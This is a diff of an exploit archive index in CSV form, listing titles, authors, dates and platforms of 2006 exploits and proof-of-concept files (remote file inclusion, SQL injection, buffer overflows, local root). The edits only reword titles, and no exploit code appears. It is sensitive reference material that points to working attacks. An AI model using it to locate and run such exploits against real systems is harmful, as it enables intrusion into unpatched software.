+2554,platforms/php/webapps/2554.php,"cPanel <= 10.8.x - (cpwrap via mysqladmin) Local Root Exploit (php)",2006-10-13,"Nima Salehi",php,webapps,0 2555,platforms/php/webapps/2555.txt,"CentiPaid <= 1.4.2 centipaid_class.php Remote File Include Vulnerability",2006-10-14,Kw3[R]Ln,php,webapps,0 2556,platforms/php/webapps/2556.txt,"E-Uploader Pro <= 1.0 Image Upload with Code Execution Vulnerability",2006-10-14,Kacper,php,webapps,0 2557,platforms/php/webapps/2557.txt,"IncCMS Core <= 1.0.0 (settings.php) Remote File Include Vulnerability",2006-10-14,Kacper,php,webapps,0 @@ -2269,7 +2269,7 @@ id,file,description,date,author,platform,type,port 2574,platforms/php/webapps/2574.php,"Simplog <= 0.9.3.1 comments.php Remote SQL Injection Exploit",2006-10-16,w4ck1ng,php,webapps,0 2575,platforms/php/webapps/2575.php,"Boonex Dolphin <= 5.2 index.php Remote Code Execution Exploit",2006-10-16,w4ck1ng,php,webapps,0 2576,platforms/php/webapps/2576.txt,"Specimen Image Database (client.php) Remote File Include Vulnerability",2006-10-16,Kw3[R]Ln,php,webapps,0 -2577,platforms/php/webapps/2577.txt,"P-News <= 1.16 Remote File Include Vulnerability",2006-10-16,vegas78,php,webapps,0 +2577,platforms/php/webapps/2577.txt,"P-News <= 1.16 - Remote File Include Vulnerability",2006-10-16,vegas78,php,webapps,0 2578,platforms/php/webapps/2578.txt,"phpMyManga <= 0.8.1 (template.php) Multiple File Include Vulnerabilities",2006-10-16,nuffsaid,php,webapps,0 2579,platforms/php/webapps/2579.pl,"WoltLab Burning Book <= 1.1.2 - Remote SQL Injection Exploit PoC",2006-10-16,ShAnKaR,php,webapps,0 2580,platforms/osx/local/2580.pl,"Xcode OpenBase <= 9.1.5 (root file create) Local Root Exploit (OSX)",2006-10-16,"Kevin Finisterre",osx,local,0 @@ -2284,7 +2284,7 @@ id,file,description,date,author,platform,type,port 2589,platforms/php/webapps/2589.txt,"Brim <= 1.2.1 (renderer) Multiple Remote File Include Vulnerabilities",2006-10-17,mdx,php,webapps,0 2590,platforms/php/webapps/2590.txt,"phpPowerCards 2.10 (txt.inc.php) Remote Code Execution Vulnerability",2006-10-18,nuffsaid,php,webapps,0 2591,platforms/php/webapps/2591.txt,"Php AMX 0.90 (plugins/main.php) Remote File Include Vulnerability",2006-10-18,MP,php,webapps,0 -2592,platforms/asp/webapps/2592.htm,"Active Bulletin Board <= 1.1b2 Remote User Pass Change Exploit",2006-10-18,ajann,asp,webapps,0 +2592,platforms/asp/webapps/2592.htm,"Active Bulletin Board <= 1.1b2 - Remote User Pass Change Exploit",2006-10-18,ajann,asp,webapps,0 2593,platforms/php/webapps/2593.php,"PHP-Post <= 1.01 (template) Remote Code Execution Exploit",2006-10-18,Kacper,php,webapps,0 2594,platforms/php/webapps/2594.php,"YapBB <= 1.2 Beta2 (yapbb_session.php) Remote File Include Exploit",2006-10-18,Kacper,php,webapps,0 2595,platforms/php/webapps/2595.txt,"LoCal Calendar 1.1 (lcUser.php) Remote File Include Vulnerability",2006-10-18,o0xxdark0o,php,webapps,0 @@ -2310,7 +2310,7 @@ id,file,description,date,author,platform,type,port 2616,platforms/php/webapps/2616.php,"JaxUltraBB <= 2.0 (delete.php) Remote Auto Deface Exploit",2006-10-22,Kacper,php,webapps,0 2617,platforms/php/webapps/2617.php,"PHP-Nuke <= 7.9 (Encyclopedia) Remote SQL Injection Exploit",2006-10-22,Paisterist,php,webapps,0 2620,platforms/php/webapps/2620.txt,"EZ-Ticket 0.0.1 (common.php) Remote File Include Vulnerability",2006-10-22,"the master",php,webapps,0 -2621,platforms/php/webapps/2621.txt,"Fully Modded phpBB <= 2021.4.40 Multiple File Include Vulnerabilities",2006-10-23,020,php,webapps,0 +2621,platforms/php/webapps/2621.txt,"Fully Modded phpBB <= 2021.4.40 - Multiple File Include Vulnerabilities",2006-10-23,020,php,webapps,0 2622,platforms/php/webapps/2622.txt,"OTSCMS <= 2.1.3 - Multiple Remote File Include Vulnerabilities",2006-10-23,GregStar,php,webapps,0 2623,platforms/php/webapps/2623.pl,"SourceForge <= 1.0.4 (database.php) Remote File Include Exploit",2006-10-23,Kw3[R]Ln,php,webapps,0 2624,platforms/php/webapps/2624.txt,"WiClear <= 0.10 (path) Remote File Include Vulnerabilities",2006-10-23,"the master",php,webapps,0 @@ -2318,7 +2318,7 @@ id,file,description,date,author,platform,type,port 2626,platforms/php/webapps/2626.txt,"MDweb <= 1.3 (chemin_appli) Remote File Include Vulnerabilities",2006-10-23,Drago84,php,webapps,0 2627,platforms/php/webapps/2627.txt,"Jaws <= 0.5.2 (include/JawsDB.php) Remote File Include Vulnerability",2006-10-23,Drago84,php,webapps,0 2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 (includes/functions.php) Remote File Include Exploit",2006-10-23,Kw3[R]Ln,php,webapps,0 -2629,platforms/windows/dos/2629.html,"MS Internet Explorer (ADODB Execute) Denial of Service PoC",2006-10-24,"YAG KOHHA",windows,dos,0 +2629,platforms/windows/dos/2629.html,"Microsoft Internet Explorer (ADODB Execute) Denial of Service PoC",2006-10-24,"YAG KOHHA",windows,dos,0 2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x (lib.editor.inc.php) Remote File Include Vulnerability",2006-10-24,"Mehmet Ince",php,webapps,0 2631,platforms/php/webapps/2631.php,"Ascended Guestbook <= 1.0.0 (embedded.php) File Include Exploit",2006-10-24,Kacper,php,webapps,0 2632,platforms/php/webapps/2632.pl,"CMS Faethon <= 2.0 (mainpath) Remote File Include Exploit",2006-10-24,r0ut3r,php,webapps,0 @@ -2346,7 +2346,7 @@ id,file,description,date,author,platform,type,port 2654,platforms/php/webapps/2654.txt,"ask_rave <= 0.9 PR (end.php footfile) Remote File Include Vulnerability",2006-10-26,v1per-haCker,php,webapps,0 2655,platforms/php/webapps/2655.php,"miniBB <= 2.0.2 (bb_func_txt.php) Remote File Include Exploit",2006-10-26,Kacper,php,webapps,0 2656,platforms/php/webapps/2656.txt,"MiniBill <= 20061010 (menu_builder.php) File Include Vulnerability",2006-10-26,"Mehmet Ince",php,webapps,0 -2657,platforms/windows/remote/2657.html,"MS Internet Explorer 7 Popup Address Bar Spoofing Weakness",2006-10-26,N/A,windows,remote,0 +2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 Popup Address Bar Spoofing Weakness",2006-10-26,N/A,windows,remote,0 2658,platforms/php/webapps/2658.php,"Light Blog Remote Multiple Vulnerabilities Exploit",2006-10-27,BlackHawk,php,webapps,0 2659,platforms/php/webapps/2659.php,"N/X WCMS <= 4.1 (nxheader.inc.php) Remote File Include Exploit",2006-10-27,Kacper,php,webapps,0 2660,platforms/php/webapps/2660.php,"Coppermine Photo Gallery 1.4.9 - Remote SQL Injection Vulnerability",2006-10-27,w4ck1ng,php,webapps,0 @@ -2379,7 +2379,7 @@ id,file,description,date,author,platform,type,port 2687,platforms/php/webapps/2687.htm,"E Annu 1.0 Login Bypass SQL Injection Exploit",2006-10-30,ajann,php,webapps,0 2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta Multiple Remote File Include Vulnerabilities",2006-10-30,v1per-haCker,php,webapps,0 2689,platforms/windows/remote/2689.c,"Novell eDirectory <= 9.0 DHost Remote Buffer Overflow Exploit",2006-10-30,Expanders,windows,remote,0 -2690,platforms/windows/remote/2690.c,"Easy File Sharing Web Server 4 Remote Information Stealer Exploit",2006-10-30,"Greg Linares",windows,remote,80 +2690,platforms/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer Exploit",2006-10-30,"Greg Linares",windows,remote,80 2691,platforms/php/webapps/2691.txt,"P-Book <= 1.17 (pb_lang) Remote File Inclusion Vulnerabilities",2006-10-31,Matdhule,php,webapps,0 2692,platforms/php/webapps/2692.txt,"GEPI <= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability",2006-10-31,"Sumit Siddharth",php,webapps,0 2693,platforms/php/webapps/2693.txt,"PwsPHP <= 1.1 (themes/fin.php) Remote File Include Vulnerablity",2006-10-31,3l3ctric-Cracker,php,webapps,0 @@ -2411,18 +2411,18 @@ id,file,description,date,author,platform,type,port 2720,platforms/php/webapps/2720.pl,"PHP Classifieds <= 7.1 (detail.php) Remote SQL Injection Exploit",2006-11-05,ajann,php,webapps,0 2721,platforms/php/webapps/2721.php,"Ultimate PHP Board <= 2.0 (header_simple.php) File Include Exploit",2006-11-05,Kacper,php,webapps,0 2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum (message_details.php) SQL Injection Exploit",2006-11-05,Bl0od3r,php,webapps,0 -2724,platforms/php/webapps/2724.txt,"Soholaunch Pro <= 4.9 r36 Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0 +2724,platforms/php/webapps/2724.txt,"Soholaunch Pro <= 4.9 r36 - Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0 2725,platforms/php/webapps/2725.txt,"Cyberfolio <= 2.0 RC1 (av) Remote File Include Vulnerabilities",2006-11-06,the_day,php,webapps,0 2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 (MysqlfinderAdmin.php) Remote File Include Vulnerability",2006-11-06,the_day,php,webapps,0 2727,platforms/php/webapps/2727.txt,"OpenEMR <= 2.8.1 (srcdir) Multiple Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0 2728,platforms/php/webapps/2728.txt,"Article Script <= 1.6.3 (rss.php) Remote SQL Injection Vulnerability",2006-11-06,Liz0ziM,php,webapps,0 2729,platforms/windows/remote/2729.pm,"Omni-NFS Server 5.2 (nfsd.exe) Remote Stack Overflow Exploit (meta)",2006-11-06,"Evgeny Legerov",windows,remote,2049 -2730,platforms/linux/dos/2730.pm,"OpenLDAP 2.2.29 Remote Denial of Service Exploit (meta)",2006-11-06,"Evgeny Legerov",linux,dos,0 +2730,platforms/linux/dos/2730.pm,"OpenLDAP 2.2.29 - Remote Denial of Service Exploit (meta)",2006-11-06,"Evgeny Legerov",linux,dos,0 2731,platforms/php/webapps/2731.pl,"iPrimal Forums (admin/index.php) Change User Password Exploit",2006-11-06,Bl0od3r,php,webapps,0 2732,platforms/php/webapps/2732.txt,"PHPGiggle 12.08 (CFG_PHPGIGGLE_ROOT) File Include Vulnerability",2006-11-06,ajann,php,webapps,0 2733,platforms/php/webapps/2733.txt,"iWare Pro <= 5.0.4 (chat_panel.php) Remote Code Execution Vulnerability",2006-11-07,nuffsaid,php,webapps,0 2734,platforms/windows/dos/2734.py,"WFTPD Pro Server 3.23.1.1 (APPE) Remote Buffer Overflow PoC",2006-11-07,"Joxean Koret",windows,dos,0 -2735,platforms/windows/dos/2735.py,"WarFTPd 1.82.00-RC11 Remote Denial of Service Exploit",2006-11-07,"Joxean Koret",windows,dos,0 +2735,platforms/windows/dos/2735.py,"WarFTPd 1.82.00-RC11 - Remote Denial of Service Exploit",2006-11-07,"Joxean Koret",windows,dos,0 2736,platforms/php/webapps/2736.txt,"PHPAdventure 1.1 (ad_main.php) Remote File Include Vulnerability",2006-11-07,HER0,php,webapps,0 2737,platforms/osx/local/2737.pl,"Xcode OpenBase <= 10.0.0 (symlink) Local Root Exploit (OSX)",2006-11-08,"Kevin Finisterre",osx,local,0 2738,platforms/osx/local/2738.pl,"Xcode OpenBase <= 10.0.0 (unsafe system call) Local Root Exploit (OSX)",2006-11-08,"Kevin Finisterre",osx,local,0 @@ -2430,17 +2430,17 @@ id,file,description,date,author,platform,type,port 2740,platforms/php/webapps/2740.txt,"vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities",2006-11-08,DeltahackingTEAM,php,webapps,0 2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 (inc/irayofuncs.php) Remote File Include Vulnerability",2006-11-08,DeltahackingTEAM,php,webapps,0 2742,platforms/php/webapps/2742.txt,"DodosMail <= 2.0.1 (dodosmail.php) Remote File Include Vulnerability",2006-11-08,"Cold Zero",php,webapps,0 -2743,platforms/windows/remote/2743.html,"MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit",2006-11-08,N/A,windows,remote,0 +2743,platforms/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit",2006-11-08,N/A,windows,remote,0 2744,platforms/php/webapps/2744.txt,"LetterIt 2.0 - (inc/session.php) Remote File Include Vulnerability",2006-11-09,v1per-haCker,php,webapps,0 2745,platforms/php/webapps/2745.txt,"gtcatalog <= 0.9.1 (index.php) Remote File Include Vulnerability",2006-11-09,v1per-haCker,php,webapps,0 2746,platforms/asp/webapps/2746.pl,"AspPired2Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit",2006-11-09,ajann,asp,webapps,0 2747,platforms/php/webapps/2747.txt,"MyAlbum <= 3.02 (language.inc.php) Remote File Inclusion Vulnerability",2006-11-09,"Silahsiz Kuvvetler",php,webapps,0 2748,platforms/php/webapps/2748.pl,"phpManta <= 1.0.2 (view-sourcecode.php) Local File Include Exploit",2006-11-09,ajann,php,webapps,0 -2749,platforms/windows/remote/2749.html,"MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit 2",2006-11-10,~Fyodor,windows,remote,0 +2749,platforms/windows/remote/2749.html,"Microsoft Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit (2)",2006-11-10,~Fyodor,windows,remote,0 2750,platforms/php/webapps/2750.txt,"EncapsCMS 0.3.6 (core/core.php) Remote File Include Vulnerability",2006-11-10,Firewall,php,webapps,0 2751,platforms/php/webapps/2751.txt,"BrewBlogger 1.3.1 (printLog.php) Remote SQL Injection Vulnerability",2006-11-10,"Craig Heffner",php,webapps,0 2752,platforms/php/webapps/2752.txt,"WORK System E-Commerce <= 3.0.1 - Remote Include Vulnerability",2006-11-10,SlimTim10,php,webapps,0 -2753,platforms/windows/remote/2753.c,"MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit 3",2006-11-10,M03,windows,remote,0 +2753,platforms/windows/remote/2753.c,"Microsoft Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit (3)",2006-11-10,M03,windows,remote,0 2754,platforms/asp/webapps/2754.pl,"NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit",2006-11-11,ajann,asp,webapps,0 2755,platforms/asp/webapps/2755.pl,"NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit",2006-11-11,ajann,asp,webapps,0 2756,platforms/asp/webapps/2756.txt,"NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability",2006-11-11,ajann,asp,webapps,0 @@ -2497,22 +2497,22 @@ id,file,description,date,author,platform,type,port 2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 (M3U Filename) Local Buffer Overflow Exploit",2006-11-20,"Greg Linares",windows,local,0 2817,platforms/php/webapps/2817.txt,"Photo Cart 3.9 (adminprint.php) Remote File Include Vulnerability",2006-11-21,irvian,php,webapps,0 2818,platforms/php/webapps/2818.txt,"e-Ark 1.0 (src/ark_inc.php) Remote File Include Vulnerability",2006-11-21,DeltahackingTEAM,php,webapps,0 -2819,platforms/php/webapps/2819.txt,"LDU <= 8.x (avatarselect id) Remote SQL Injection Vulnerability",2006-11-21,nukedx,php,webapps,0 +2819,platforms/php/webapps/2819.txt,"LDU <= 8.x - (avatarselect id) Remote SQL Injection Vulnerability",2006-11-21,nukedx,php,webapps,0 2820,platforms/php/webapps/2820.txt,"Seditio <= 1.10 (avatarselect id) Remote SQL Injection Vulnerability",2006-11-21,nukedx,php,webapps,0 2821,platforms/windows/remote/2821.c,"XMPlay 3.3.0.4 (PLS) Local/Remote Buffer Overflow Exploit",2006-11-21,"Greg Linares",windows,remote,0 2822,platforms/php/webapps/2822.pl,"ContentNow 1.39 (pageid) Remote SQL Injection Exploit",2006-11-21,Revenge,php,webapps,0 2823,platforms/php/webapps/2823.txt,"aBitWhizzy (abitwhizzy.php) Information Disclosure Vulnerability",2006-11-21,"Security Access Point",php,webapps,0 2824,platforms/windows/local/2824.c,"XMPlay 3.3.0.4 (ASX Filename) Local Buffer Overflow Exploit",2006-11-21,"Greg Linares",windows,local,0 2826,platforms/php/webapps/2826.txt,"Pearl Forums 2.4 - Multiple Remote File Include Vulnerabilities",2006-11-21,3l3ctric-Cracker,php,webapps,0 -2827,platforms/php/webapps/2827.txt,"phpPC <= 1.04 Multiple Remote File Inclusion Vulnerabilities",2006-11-21,iss4m,php,webapps,0 +2827,platforms/php/webapps/2827.txt,"phpPC <= 1.04 - Multiple Remote File Inclusion Vulnerabilities",2006-11-21,iss4m,php,webapps,0 2828,platforms/asp/webapps/2828.pl,"fipsCMS <= 4.5 (index.asp) Remote SQL Injection Exploit",2006-11-22,ajann,asp,webapps,0 2829,platforms/asp/webapps/2829.txt,"fipsGallery <= 1.5 (index1.asp) Remote SQL Injection Vulnerability",2006-11-22,ajann,asp,webapps,0 2830,platforms/asp/webapps/2830.txt,"fipsForum <= 2.6 (default2.asp) Remote SQL Injection Vulnerability",2006-11-22,ajann,asp,webapps,0 2831,platforms/php/webapps/2831.txt,"a-ConMan <= 3.2b (common.inc.php) Remote File Inclusion Vulnerability",2006-11-22,Matdhule,php,webapps,0 2832,platforms/php/webapps/2832.txt,"Messagerie Locale (centre.php) Remote File Inclusion Vulnerability",2006-11-23,DaDIsS,php,webapps,0 2833,platforms/php/webapps/2833.txt,"Site News (centre.php) Remote File Inclusion Vulnerability",2006-11-23,DaDIsS,php,webapps,0 -2834,platforms/php/webapps/2834.txt,"Recipes Complete Website 1.1.14 Remote SQL Injection Vulnerabilities",2006-11-23,GregStar,php,webapps,0 -2835,platforms/php/webapps/2835.txt,"Wallpaper Complete Website 1.0.09 Remote SQL Injection Vulnerabilities",2006-11-23,GregStar,php,webapps,0 +2834,platforms/php/webapps/2834.txt,"Recipes Complete Website 1.1.14 - Remote SQL Injection Vulnerabilities",2006-11-23,GregStar,php,webapps,0 +2835,platforms/php/webapps/2835.txt,"Wallpaper Complete Website 1.0.09 - Remote SQL Injection Vulnerabilities",2006-11-23,GregStar,php,webapps,0 2836,platforms/php/webapps/2836.txt,"JiRos FAQ Manager 1.0 (index.asp) Remote SQL Injection Vulnerability",2006-11-23,ajann,php,webapps,0 2837,platforms/multiple/remote/2837.sql,"Oracle <= 9i / 10g (read/write/execute) Exploitation Suite",2006-11-23,"Marco Ivaldi",multiple,remote,0 2838,platforms/php/webapps/2838.txt,"HSRS 1.0 (addcode.php) Remote File Include Vulnerability",2006-11-23,"Cold Zero",php,webapps,0 @@ -2527,7 +2527,7 @@ id,file,description,date,author,platform,type,port 2848,platforms/asp/webapps/2848.txt,"Basic Forum <= 1.1 (edit.asp) Remote SQL Injection Vulnerability",2006-11-25,bolivar,asp,webapps,0 2849,platforms/asp/webapps/2849.txt,"ASP-Nuke Community <= 1.5 Cookie Privilege Escalation Vulnerability",2006-11-25,ajann,asp,webapps,0 2850,platforms/php/webapps/2850.txt,"Exhibit Engine <= 1.22 (styles.php) Remote File Include Vulnerability",2006-11-25,Kacper,php,webapps,0 -2851,platforms/php/webapps/2851.txt,"Hacks List phpBB Mod <= 1.21 Remote SQL Injection Vulnerability",2006-11-26,"the master",php,webapps,0 +2851,platforms/php/webapps/2851.txt,"Hacks List phpBB Mod <= 1.21 - Remote SQL Injection Vulnerability",2006-11-26,"the master",php,webapps,0 2852,platforms/php/webapps/2852.txt,"com_flyspray Mambo Com. <= 1.0.1 - Remote File Disclosure Vulnerability",2006-11-26,3l3ctric-Cracker,php,webapps,0 2853,platforms/asp/webapps/2853.txt,"SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability",2006-11-26,bolivar,asp,webapps,0 2854,platforms/windows/dos/2854.py,"AT-TFTP <= 1.9 - (Long Filename) Remote Buffer Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0 @@ -2539,7 +2539,7 @@ id,file,description,date,author,platform,type,port 2860,platforms/windows/dos/2860.c,"Quintessential Player <= 4.50.1.82 (Playlist) Denial of Service PoC",2006-11-28,"Greg Linares",windows,dos,0 2861,platforms/windows/dos/2861.c,"Songbird Media Player <= 0.2 Format String Denial of Service PoC",2006-11-28,"Greg Linares",windows,dos,0 2862,platforms/php/webapps/2862.txt,"P-News 2.0 - (user.txt) Remote Password Disclosure Vulnerability",2006-11-28,Lu7k,php,webapps,0 -2863,platforms/php/webapps/2863.php,"kubix <= 0.7 - Multiple Vulnerabilities exploit",2006-11-29,BlackHawk,php,webapps,0 +2863,platforms/php/webapps/2863.php,"kubix <= 0.7 - Multiple Vulnerabilities Exploit",2006-11-29,BlackHawk,php,webapps,0 2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 - 1.9b (import-mt.php) Remote File Include Vulnerability",2006-11-29,tarkus,php,webapps,0 2865,platforms/windows/remote/2865.rb,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Overflow Exploit",2006-11-30,cthulhu,windows,remote,69 2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch (ActiveX Control) Command Execution Exploit",2006-11-30,"Tan Chew Keong",windows,remote,0 @@ -2592,33 +2592,33 @@ id,file,description,date,author,platform,type,port 2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 (ARP Flood) Remote Denial of Service Exploit",2006-12-11,poplix,hardware,dos,0 2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 (USER/PASS) Heap Overflow PoC",2006-12-11,rgod,windows,dos,0 2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 (common.php) Remote Inclusion Vulnerability",2006-12-11,bd0rk,php,webapps,0 -2919,platforms/php/webapps/2919.pl,"mxBB Module Activity Games 0.92 Remote File Include Vulnerability",2006-12-11,3l3ctric-Cracker,php,webapps,0 +2919,platforms/php/webapps/2919.pl,"mxBB Module Activity Games 0.92 - Remote File Include Vulnerability",2006-12-11,3l3ctric-Cracker,php,webapps,0 2920,platforms/php/webapps/2920.txt,"Barman 0.0.1r3 (interface.php) Remote File Include Vulnerability",2006-12-11,DeltahackingTEAM,php,webapps,0 2921,platforms/php/webapps/2921.txt,"mxBB Module mx_modsdb 1.0 - Remote File Include Vulnerability",2006-12-12,Lu7k,php,webapps,0 2922,platforms/windows/dos/2922.txt,"Microsoft Word Document (malformed pointer) Proof of Concept",2006-12-12,DiscoJonny,windows,dos,0 2923,platforms/php/webapps/2923.txt,"BLOG:CMS <= 4.1.3 (NP_UserSharing.php) Remote Inclusion Vulnerability",2006-12-12,"HACKERS PAL",php,webapps,0 2924,platforms/php/webapps/2924.txt,"mxBB Module kb_mods <= 2.0.2 - Remote Inclusion Vulnerabilities",2006-12-12,3l3ctric-Cracker,php,webapps,0 -2925,platforms/php/webapps/2925.pl,"mxBB Module newssuite 1.03 Remote File Inclusion Exploit",2006-12-12,3l3ctric-Cracker,php,webapps,0 +2925,platforms/php/webapps/2925.pl,"mxBB Module newssuite 1.03 - Remote File Inclusion Exploit",2006-12-12,3l3ctric-Cracker,php,webapps,0 2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 (LIST/NLST) Denial of Service Exploit",2006-12-13,shinnai,windows,dos,0 -2927,platforms/php/webapps/2927.txt,"PhpMyCms <= 0.3 (basic.inc.php) Remote File Include Vulnerability",2006-12-13,v1per-haCker,php,webapps,0 +2927,platforms/php/webapps/2927.txt,"PhpMyCMS <= 0.3 (basic.inc.php) Remote File Include Vulnerability",2006-12-13,v1per-haCker,php,webapps,0 2928,platforms/linux/dos/2928.py,"ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC",2006-12-13,"Core Security",linux,dos,0 -2929,platforms/windows/dos/2929.cpp,"MS Internet Explorer 7 (DLL-load hijacking) Code Execution Exploit PoC",2006-12-14,"Aviv Raff",windows,dos,0 +2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 (DLL-load hijacking) Code Execution Exploit PoC",2006-12-14,"Aviv Raff",windows,dos,0 2930,platforms/php/webapps/2930.pl,"yaplap <= 0.6.1b (ldap.php) Remote File Include Exploit",2006-12-14,DeltahackingTEAM,php,webapps,0 2931,platforms/php/webapps/2931.txt,"AR Memberscript (usercp_menu.php) Remote File Include Vulnerability",2006-12-14,ex0,php,webapps,0 2933,platforms/linux/remote/2933.c,"OpenLDAP <= 2.4.3 (KBIND) Remote Buffer Overflow Exploit",2006-12-15,"Solar Eclipse",linux,remote,389 2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 (SIZE) Remote Denial of Service Exploit",2006-12-15,rgod,windows,dos,0 2935,platforms/windows/dos/2935.sh,"Windows Media Player 9/10 (MID File) Denial of Service Exploit",2006-12-15,sehato,windows,dos,0 2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 (ld.so.preload) Remote Root Exploit",2006-12-15,kingcope,linux,remote,21 -2937,platforms/php/webapps/2937.php,"extreme-fusion <= 4.02 Remote Code Execution Exploit",2006-12-16,Kacper,php,webapps,0 +2937,platforms/php/webapps/2937.php,"extreme-fusion <= 4.02 - Remote Code Execution Exploit",2006-12-16,Kacper,php,webapps,0 2938,platforms/php/webapps/2938.htm,"Bandwebsite <= 1.5 (Login) Remote Add Admin Exploit",2006-12-16,H0tTurk-,php,webapps,0 -2939,platforms/php/webapps/2939.txt,"mxBB Module WebLinks <= 2.05 Remote Inclusion Vulnerability",2006-12-16,ajann,php,webapps,0 +2939,platforms/php/webapps/2939.txt,"mxBB Module WebLinks <= 2.05 - Remote Inclusion Vulnerability",2006-12-16,ajann,php,webapps,0 2940,platforms/php/webapps/2940.txt,"mxbb module charts <= 1.0.0 - Remote File Inclusion Vulnerability",2006-12-16,ajann,php,webapps,0 2941,platforms/php/webapps/2941.txt,"mxBB Module Meeting <= 1.1.2 - Remote FileInclusion Vulnerability",2006-12-16,ajann,php,webapps,0 2942,platforms/windows/dos/2942.py,"Star FTP Server 1.10 (RETR) Remote Denial of Service Exploit",2006-12-17,Necro,windows,dos,0 -2943,platforms/php/webapps/2943.txt,"Azucar CMS <= 1.3 (admin/index_sitios.php) File Inclusion Vulnerability",2006-12-18,nuffsaid,php,webapps,0 +2943,platforms/php/webapps/2943.txt,"Azucar CMS <= 1.3 - (admin/index_sitios.php) File Inclusion Vulnerability",2006-12-18,nuffsaid,php,webapps,0 2944,platforms/php/webapps/2944.txt,"VerliAdmin <= 0.3 (index.php) Remote File Include Exploit",2006-12-18,Kacper,php,webapps,0 2945,platforms/php/webapps/2945.txt,"Uploader & Downloader 3.0 (id_user) Remote SQL Injection Vulnerability",2006-12-18,"the master",php,webapps,0 -2946,platforms/windows/dos/2946.html,"MS Office Outlook Recipient Control (ole32.dll) Denial of Service Exploit",2006-12-18,shinnai,windows,dos,0 +2946,platforms/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control (ole32.dll) Denial of Service Exploit",2006-12-18,shinnai,windows,dos,0 2947,platforms/multiple/dos/2947.pl,"wget <= 1.10.2 (Unchecked Boundary Condition) Denial of Service Exploit",2006-12-18,"Federico L. Bossi Bonin",multiple,dos,0 2948,platforms/php/webapps/2948.txt,"RateMe <= 1.3.2 (main.inc.php) Remote File Include Vulnerability",2006-12-18,"Al7ejaz Hacker",php,webapps,0 2949,platforms/multiple/dos/2949.c,"Intel 2200BG 802.11 Beacon frame Kernel Memory Corruption Exploit",2006-12-19,"Breno Silva Pinto",multiple,dos,0 @@ -2653,7 +2653,7 @@ id,file,description,date,author,platform,type,port 2978,platforms/windows/dos/2978.py,"XM Easy Personal FTP Server 5.2.1 (USER) Format String DoS Exploit",2006-12-22,shinnai,windows,dos,0 2979,platforms/php/webapps/2979.txt,"KISGB <= 5.1.1 (authenticate.php) Remote File Include Vulnerability",2006-12-22,mdx,php,webapps,0 2980,platforms/php/webapps/2980.txt,"EternalMart Guestbook 1.10 (admin/auth.php) Remote Inclusion Vuln",2006-12-22,mdx,php,webapps,0 -2981,platforms/php/webapps/2981.php,"open newsletter <= 2.5 - Multiple Vulnerabilities exploit (update)",2006-12-23,BlackHawk,php,webapps,0 +2981,platforms/php/webapps/2981.php,"open newsletter <= 2.5 - Multiple Vulnerabilities Exploit (update)",2006-12-23,BlackHawk,php,webapps,0 2982,platforms/php/webapps/2982.txt,"3editor CMS <= 0.42 (index.php) Local File Include Vulnerability",2006-12-22,3l3ctric-Cracker,php,webapps,0 2983,platforms/php/webapps/2983.txt,"b2 Blog <= 0.5 (b2verifauth.php) Remote File Include Vulnerability",2006-12-23,mdx,php,webapps,0 2984,platforms/php/webapps/2984.txt,"SH-News 0.93 (misc.php) Remote File Include Exploit",2006-12-23,bd0rk,php,webapps,0 @@ -2689,7 +2689,7 @@ id,file,description,date,author,platform,type,port 3014,platforms/php/webapps/3014.txt,"logahead UNU edition 1.0 - Remote Upload File / Code Execution Vuln",2006-12-25,CorryL,php,webapps,0 3015,platforms/asp/webapps/3015.pl,"The Classified Ad System 1.0 (main) Remote SQL Injection Exploit",2006-12-26,ajann,asp,webapps,0 3016,platforms/php/webapps/3016.php,"Cahier de texte 2.2 Bypass General Access Protection Exploit",2006-12-26,DarkFig,php,webapps,0 -3017,platforms/php/webapps/3017.php,"php-update <= 2.7 - Multiple Vulnerabilities exploit",2006-12-26,rgod,php,webapps,0 +3017,platforms/php/webapps/3017.php,"php-update <= 2.7 - Multiple Vulnerabilities Exploit",2006-12-26,rgod,php,webapps,0 3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb <= 2.0.1b Remote File Include Vulnerability",2006-12-26,bd0rk,php,webapps,0 3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b (cal_dir) Remote File Include Vulnerabilities",2006-12-26,Cr@zy_King,php,webapps,0 